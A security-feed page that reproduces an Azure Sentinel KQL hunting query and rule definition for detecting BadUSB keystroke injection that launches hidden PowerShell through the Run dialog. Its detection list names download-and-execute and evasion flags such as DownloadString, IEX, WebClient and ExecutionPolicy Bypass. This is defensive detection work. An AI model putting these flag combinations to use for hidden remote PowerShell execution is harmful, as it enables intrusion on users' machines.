← Back to SOC feed Coverage →

BadUSB HID injection PowerShell via Windows Run dialog

kql MEDIUM Azure-Sentinel
T1059.001T1564.003T1200
DeviceProcessEvents
evasionhuntingmicrosoftofficialpowershell
This rule was pulled from an open-source repository and enriched with AI. Validate in a test environment before deploying to production.
View original rule at Azure-Sentinel →
Retrieved: 2026-05-27T23:00:00Z · Confidence: medium

Hunt Hypothesis

Adversaries may use BadUSB HID injection to execute PowerShell via the Windows Run dialog, leveraging T1059.001 and T1564.003 to evade detection and establish persistence. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential USB-based attacks that bypass traditional endpoint defenses.

KQL Query

let timeframe = 1d;
let EvasionFlags = dynamic([
    "-NoProfile",
    "-NonInteractive",
    "-EncodedCommand",
    "DownloadString",
    "IEX",
    "Invoke-Expression",
    "WebClient",
    "Start-Process"
]);
DeviceProcessEvents
| where TimeGenerated >= ago(timeframe)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where InitiatingProcessFileName =~ "explorer.exe"
| where ProcessCommandLine has_all ("-WindowStyle", "Hidden")
| where ProcessCommandLine has_any (EvasionFlags)
    or ProcessCommandLine has_all ("-ExecutionPolicy", "Bypass")
| extend AccountCustomEntity = AccountName
| extend HostCustomEntity    = DeviceName
| project
    TimeGenerated,
    DeviceName,
    HostCustomEntity,
    AccountName,
    AccountCustomEntity,
    AccountDomain,
    ProcessCommandLine,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine,
    ReportId
| sort by TimeGenerated desc

Analytic Rule Definition

id: 683b2baa-39c3-457d-b64e-2e57c8fc83ba
name: BadUSB HID injection PowerShell via Windows Run dialog
description: |
  Identifies PowerShell spawned by explorer.exe with a hidden window and a
  remote-execution or evasion flag. Consistent with BadUSB HID injection opening
  the Windows Run dialog via WIN+R; the explorer.exe parent is the keystroke-
  injection signal.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
tactics:
  - Execution
  - DefenseEvasion
  - InitialAccess
relevantTechniques:
  - T1059.001
  - T1564.003
  - T1200
query: |
  let timeframe = 1d;
  let EvasionFlags = dynamic([
      "-NoProfile",
      "-NonInteractive",
      "-EncodedCommand",
      "DownloadString",
      "IEX",
      "Invoke-Expression",
      "WebClient",
      "Start-Process"
  ]);
  DeviceProcessEvents
  | where TimeGenerated >= ago(timeframe)
  | where FileName in~ ("powershell.exe", "pwsh.exe")
  | where InitiatingProcessFileName =~ "explorer.exe"
  | where ProcessCommandLine has_all ("-WindowStyle", "Hidden")
  | where ProcessCommandLine has_any (EvasionFlags)
      or ProcessCommandLine has_all ("-ExecutionPolicy", "Bypass")
  | extend AccountCustomEntity = AccountName
  | extend HostCustomEntity    = DeviceName
  | project
      TimeGenerated,
      DeviceName,
      HostCustomEntity,
      AccountName,
      AccountCustomEntity,
      AccountDomain,
      ProcessCommandLine,
      InitiatingProcessFileName,
      InitiatingProcessCommandLine,
      ReportId
  | sort by TimeGenerated desc
entityMappings:
  - entityType: Account
    fieldMappings:
      - identifier: Name
        columnName: AccountCustomEntity
      - identifier: NTDomain
        columnName: AccountDomain
  - entityType: Host
    fieldMappings:
      - identifier: HostName
        columnName: HostCustomEntity
version: 1.0.0
metadata:
    source:
        kind: Community
    author:
        name: descambiado
    support:
        tier: Community
    categories:
        domains: [ "Security - Threat Protection" ]

Required Data Sources

Sentinel TableNotes
DeviceProcessEventsEnsure this data connector is enabled

MITRE ATT&CK Context

References

False Positive Guidance

Original source: https://github.com/Azure/Azure-Sentinel/blob/main/Hunting Queries/DeviceProcess/BadUSBPowerShellRunDialog.yaml